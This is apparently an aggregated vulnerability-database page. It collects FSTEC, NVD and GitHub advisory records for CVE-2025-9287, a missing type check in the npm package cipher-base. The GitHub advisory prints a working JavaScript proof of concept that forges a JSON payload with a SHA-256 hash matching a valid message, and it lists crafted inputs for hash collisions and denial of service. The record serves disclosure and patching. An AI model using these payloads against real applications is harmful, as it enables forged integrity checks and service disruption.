"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2026-03-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266518",
"url": "https://www.ibm.com/support/pages/node/7266518"
},
{
"published_at": "2026-03-13",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7263574",
"url": "https://www.ibm.com/support/pages/node/7263574"
},
{
"published_at": "2026-03-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266520",
"url": "https://www.ibm.com/support/pages/node/7266520"
},
{
"published_at": "2026-03-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266678",
"url": "https://www.ibm.com/support/pages/node/7266678"
},
{
"published_at": "2026-03-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266497",
"url": "https://www.ibm.com/support/pages/node/7266497"
},
{
"published_at": "2026-03-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266324",
"url": "https://www.ibm.com/support/pages/node/7266324"
},
{
"published_at": "2026-03-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266711",
"url": "https://www.ibm.com/support/pages/node/7266711"
},
{
"published_at": "2026-03-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266677",
"url": "https://www.ibm.com/support/pages/node/7266677"
},
{
"published_at": "2026-03-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266399",
"url": "https://www.ibm.com/support/pages/node/7266399"
},
{
"published_at": "2026-03-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266321",
"url": "https://www.ibm.com/support/pages/node/7266321"
}
]
}
BDU:2025-10188
Vulnerability from fstec - Published: 21.08.2025
VLAI Severity ?
Title
Уязвимость пакета cipher-base программной платформы Node.js, позволяющая нарушителю выполнить произвольный код
Description
Уязвимость пакета cipher-base программной платформы Node.js связана с недостатками механизма проверки входных данных. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, выполнить произвольный код путем отправки специально сформированного JSON-файла
Severity ?
Vendor
Node.js Foundation, Сообщество свободного программного обеспечения
Software Name
Node.js, cipher-base
Software Version
- (Node.js), до 1.0.4 (cipher-base)
Possible Mitigations
Установка обновлений из доверенных источников. В связи со сложившейся обстановкой и введенными санкциями против Российской Федерации рекомендуется устанавливать обновления программного обеспечения только после оценки всех сопутствующих рисков.
Компенсирующие меры:
- использование антивирусного программного обеспечения для проверки файлов, полученных из недоверенных источников;
- использование замкнутой программной среды для работы с файлами, полученными из недоверенных источников;
- использование средств межсетевого экранирования для ограничения возможности удалённого доступа к уязвимому программному обеспечению;
- использование систем обнаружения и предотвращения вторжений для обнаружения (выявления, регистрации) и реагирования на попытки эксплуатации уязвимостей;
- ограничение доступа к уязвимому программному обеспечению из внешних сетей (Интернет).
Источники информации:
https://github.com/browserify/cipher-base/pull/23
Reference
https://github.com/browserify/cipher-base/pull/23
https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc
CWE
CWE-20
{
"CVSS 2.0": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"CVSS 3.0": "AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"CVSS 4.0": "AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N",
"remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
"remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
"\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "Node.js Foundation, \u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "- (Node.js), \u0434\u043e 1.0.4 (cipher-base)",
"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0438\u0437 \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432. \u0412 \u0441\u0432\u044f\u0437\u0438 \u0441\u043e \u0441\u043b\u043e\u0436\u0438\u0432\u0448\u0435\u0439\u0441\u044f \u043e\u0431\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u043e\u0439 \u0438 \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u043c\u0438 \u0441\u0430\u043d\u043a\u0446\u0438\u044f\u043c\u0438 \u043f\u0440\u043e\u0442\u0438\u0432 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u043e\u0446\u0435\u043d\u043a\u0438 \u0432\u0441\u0435\u0445 \u0441\u043e\u043f\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u0440\u0438\u0441\u043a\u043e\u0432.\n\n\u041a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b:\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0445 \u0438\u0437 \u043d\u0435\u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u0430\u043c\u043a\u043d\u0443\u0442\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u044b \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c\u0438 \u0438\u0437 \u043d\u0435\u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043b\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c\u0443 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044e;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (\u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f, \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438) \u0438 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439;\n- \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c\u0443 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044e \u0438\u0437 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u0435\u0442\u0435\u0439 (\u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442). \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438:\nhttps://github.com/browserify/cipher-base/pull/23",
"\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "21.08.2025",
"\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "22.08.2025",
"\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "22.08.2025",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2025-10188",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2025-9287",
"\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
"\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
"\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "Node.js, cipher-base",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": null,
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0430\u043a\u0435\u0442\u0430 cipher-base \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Node.js, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434",
"\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0432\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 (CWE-20)",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0430\u043a\u0435\u0442\u0430 cipher-base \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Node.js \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e JSON-\u0444\u0430\u0439\u043b\u0430",
"\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
"\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
"\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u041c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c\u0438",
"\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://github.com/browserify/cipher-base/pull/23\nhttps://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc",
"\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
"\u0422\u0438\u043f \u041f\u041e": "\u0421\u0435\u0442\u0435\u0432\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e, \u041f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0435 \u041f\u041e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c",
"\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-20",
"\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0412\u044b\u0441\u043e\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 7,6)\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.1 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 9)\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS 4.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 9,1)"
}
FKIE_CVE-2025-9287
Vulnerability from fkie_nvd - Published: 2025-08-20 22:15 - Updated: 2025-11-03 19:16
Severity ?
Summary
Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.
References
| URL | Tags | ||
|---|---|---|---|
| 7ffcee3d-2c14-4c3e-b844-86c6a321a158 | https://github.com/browserify/cipher-base/pull/23 | Issue Tracking, Patch | |
| 7ffcee3d-2c14-4c3e-b844-86c6a321a158 | https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc | Exploit, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html | ||
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc | Exploit, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| browserify | cipher-base | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:browserify:cipher-base:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "485D8065-DEFF-404E-934D-DCA8E4C10860",
"versionEndIncluding": "1.0.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4."
},
{
"lang": "es",
"value": "La vulnerabilidad de validaci\u00f3n de entrada incorrecta en cipher-base permite la manipulaci\u00f3n de datos de entrada. Este problema afecta a cipher-base: hasta 1.0.4."
}
],
"id": "CVE-2025-9287",
"lastModified": "2025-11-03T19:16:17.187",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
"type": "Secondary"
}
]
},
"published": "2025-08-20T22:15:30.557",
"references": [
{
"source": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/browserify/cipher-base/pull/23"
},
{
"source": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
}
],
"sourceIdentifier": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-CPQ7-6GPM-G9RC
Vulnerability from github – Published: 2025-08-21 14:47 – Updated: 2025-11-03 21:34
VLAI?
Summary
cipher-base is missing type checks, leading to hash rewind and passing on crafted data
Details
Summary
This affects e.g. create-hash (and crypto-browserify), so I'll describe the issue against that package
Also affects create-hmac and other packages
Node.js createHash works only on strings or instances of Buffer, TypedArray, or DataView.
Missing input type checks (in npm create-hash polyfill of Node.js createHash) can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.
Details
See PoC
PoC
const createHash = require('create-hash/browser.js')
const { randomBytes } = require('crypto')
const sha256 = (...messages) => {
const hash = createHash('sha256')
messages.forEach((m) => hash.update(m))
return hash.digest('hex')
}
const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever
console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
Output:
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
Hashed input means safe
This works with:
const forgeHash = (valid, wanted) => JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])
But there are other types of input which lead to unchecked results
Impact
- Hash state rewind on
{length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash. - Value miscalculation, e.g. a collision is generated by
{ length: buf.length, ...buf, 0: buf[0] + 256 }This will result in the same hash as ofbuf, but can be treated by other code differently (e.g. bn.js) - DoS on
{length:'1e99'} - On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like GHSA-vjh7-7g9h-fjfh)
- Also, other typed arrays results are invalid, e.g. returned hash of
new Uint16Array(5)is the same asnew Uint8Array(5), notnew Uint16Array(10)as it should have been (and is in Node.jscrypto) -- same for arrays with values non-zero, their hashes are just truncated to%256instead of converted to correct bytelength
Severity ?
9.1 (Critical)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.4"
},
"package": {
"ecosystem": "npm",
"name": "cipher-base"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-9287"
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-21T14:47:35Z",
"nvd_published_at": "2025-08-20T22:15:30Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nThis affects e.g. `create-hash` (and `crypto-browserify`), so I\u0027ll describe the issue against that package\nAlso affects `create-hmac` and other packages\n\nNode.js `createHash` works only on strings or instances of Buffer, TypedArray, or DataView.\n\nMissing input type checks (in npm `create-hash` polyfill of Node.js `createHash`) can allow types other than a well-formed `Buffer` or `string`, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.\n\n### Details\n\nSee PoC\n\n### PoC\n```js\nconst createHash = require(\u0027create-hash/browser.js\u0027)\nconst { randomBytes } = require(\u0027crypto\u0027)\n\nconst sha256 = (...messages) =\u003e {\n const hash = createHash(\u0027sha256\u0027)\n messages.forEach((m) =\u003e hash.update(m))\n return hash.digest(\u0027hex\u0027)\n}\n\nconst validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever\n\nconst payload = 